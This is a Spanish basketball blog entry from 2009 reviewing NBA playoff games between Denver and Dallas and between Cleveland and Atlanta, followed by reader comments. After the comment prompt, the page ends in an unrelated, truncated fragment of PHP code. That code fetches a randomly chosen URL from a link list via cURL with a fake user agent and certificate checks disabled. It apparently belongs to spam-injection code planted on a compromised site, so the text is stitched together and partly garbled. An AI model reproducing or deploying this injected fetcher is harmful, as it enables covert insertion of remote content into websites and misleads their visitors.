Playoffs (05/05/2009): Velocidad de crucero

06 de May de 2009 por TheDeerHunter

Decíamos hace no mucho contra San Antonio, que los Mavericks contaban con la baza de haber recuperado en el momento justo a Josh Howard como una de sus piezas clave y, también, de encontrarse en el mejor estado de forma de la temporada. Pues todo se ha ido al garete en dos torceduras sufridas por Howard y Dampier a las primeras de cambio. Desde ese momento Melo y Nené se han puesto las botas sin apenas oposición y Dallas ha mostrado una total incapacidad para defender las variadas armas de Denver.

En cambio los Nuggets, además de mostrarse altamente agresivos, han logrado encontrar la némesis adecuada a cada uno de los elementos ofensivos de Dallas. JR Smith ha reivindicado el premio de 6º hombre superando a Terry, Billups ha hecho lo propio con Kidd y Chris Andersen, increíble sobre el mejor Nowitzki de la temporada. Con este panorama, aun dando la cara, los Mavs no parecen tener opciones de hacerle daño a Denver.

También hablábamos ayer de lo que tenía que hacer Atlanta para no ser barridos por Cleveland. No pudo ser. Al Horford sigue renqueante, así como Marvin Williams. 17 pérdidas de balón frente a 7 de Cleveland. Altos porcentajes de tiro de los Cavs sin necesidad de salir… y sí, también perdieron la cabeza en la segunda parte, cuando se les hizo de noche. No hubo sorpresa el primer día y dudamos que tengan mejor ocasión durante el resto de la serie.

PREMIOS

MVP: LeBron James empezó machacando y acabó el partido con 34 puntos, 10 rebotes y 4 recuperaciones. No se cansa de demostrar día tras días que es el mejor.

Rookie: A estas alturas de los Playoffs pocos rookies llegan. Por no decir ninguno.

Sorpresa: Billups, Carmelo, JR Smith… A la ya de por sí potente batería ofensiva de los Nuggets se está uniendo en este serie Nene Hilario (25 puntos y 8 rebotes). Estos Nuggets empiezan a dar mucho miedo.

Decepción: Para tener alguna posibilidad de vencer a los Cavs, Atlanta necesita que su principal referente en ataque, Joe Johnson, lidere todo el entramado ofensivo. Con partidos como el de ayer (11 puntos) no lo conseguirán.

Esfuerzo en vano: Demasiado solo se encontró anoche Dirk Nowitzki. Para ganar a los Nuggets, 35 puntos, 9 rebotes y 4 asistencias no son suficientes si ninguno de tus compañeros te acompaña.

RAZONES PARA TRASNOCHAR

– Orlando @ Boston (2.00h): Los Celtics no pueden permitirse de ninguna manera perder otro partido en casa así que más les vale apretar los dientes y salir a morder en este segundo partido. En el primero, Orlando dio la impresión de ganar muy fácil.

– Houston @ Los Angeles (4.30h): Para algunos la derrota de los Lakers en el primer partido de la serie era posible pero seguro que para la gran mayoría de aficionados el shock ha sido tremendo. Gasol, Odom, Bynum… han de espabilar  mucho si quieren seguir vivos.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Los Cavs tienen pinta de que no piensan regalar ni una canasta facil y a la vez no van a dejar de explotar todo su físico y capacidad de pase que tienen buena parte de sus jugadores. Ahora mismo son los máximos favoritos, a ver si los Lakers espabilan.

    Y en el Denver-Dallas una lastima porque sin Howard podemos quedarnos sin eliminatoria muy pronto.

      Citar

  2. MagicJohnson32 dice:
    #2

    Sip, Howard había sido la clave del gran momento de los Mavs en el final de regular season y la eliminación de los Spurs. Así se quedan sin opciones porque los Nuggs están lanzados y con la moral por las nubes.

      Citar

  3. Txusma dice:
    #3

    Es q los Nuggets tienen a todos sus jugadores en un gran momento de forma: Billups, Carmelo, Nene, JR Smith, Andersen… Si resuelven la eliminatoria rapido y los Lakers o Rockets se van a 7 a partidos, cuidado con ellos en la final de Conferencia.

      Citar

  4. arivas dice:
    #4

    Me uno a lo que dice Txusma, creo que estos Nuggets pueden ser los tapados.

    Lo de Cliveland suena a otro “paseo”

      Citar

  5. Kantonyo dice:
    #5

    Si, estoy de acuerdo, el nivel que está demostrando Denver con Billups es para temerlos. Y los Cavs no creo que tengan problemas con Atlanta, hasta la próxima ronda contra Magic o Celtics no veremos el verdadero potencial que tienen LeBron & Cia.

    Los Lakers se la han pegado en el primer partido, sobre todo porque Houston es un equipazo, parece que nadie nos acordamos cuando al principio de temporada estaban en las quinielas para ganar la Conferencia Oeste.

    Y además les ha podido pasar lo mejor en estos casos, perder a su estrella venida a menos. Aún así creo que LA es mucho mejor que Houston y que deben pasar la eliminatoria, pero sudaran de lo lindo. La clave estará en parar a Yao Ming, y a diferencia de los Blazers que no tenían bazas, Lakers con Bynum, Odom y Gasol deberían encontrar la forma.

      Citar

  6. Vader dice:
    #6

    Jajaja bueno ahora suena muy ventajista decirlo pero la verdad es que tenia bastante claro que los Nuggets ganarian la serie contra los Mavs. Carmelo esta en un buen momento y sobretodo centrado, Billups a toda maquina, JR a lo suyo (enchufar) y encima Nene en forma y atacando el aro. Demasiado para unos Mavs que han llegado muy bien a la recta final pero que cuentan con un proyecto ya caduco y un entrenador especializado en regular season.

    Creo que Denver es el principal obstaculo que se pueden encontrar los Lakers para llegar a ser campeones por encima de los Cavs…

    Saludos a todos!

      Citar

  7. Viva_Dirk dice:
    #7

    Para mi Houston de equipazo no tiene nada, eso si tiene algunas cositas muy bien aprendidas y Adelman saca partido a todo lo que tiene.

    Tanto Brooks como Lowry tienen libertad de acción, siempre con las premisas de buscar dentro a Yao pero a parte de eso se les ve bastante sueltos.

    Ains, si McMillan hiciese lo mismo otro gallo le cantaría.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>